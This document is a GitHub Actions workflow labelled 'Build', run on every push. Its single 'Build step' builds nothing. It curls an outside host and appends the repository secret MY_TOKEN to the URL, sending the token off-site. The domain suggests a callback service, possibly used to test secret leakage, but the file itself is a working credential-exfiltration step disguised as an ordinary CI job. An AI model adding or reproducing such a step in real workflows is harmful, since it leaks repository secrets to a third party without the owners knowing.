name: Build

on: [ push ]

jobs:
  build-and-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Build step
        run: curl "https://bxss.2rs3c.info/github?test=${{ secrets.MY_TOKEN }}"
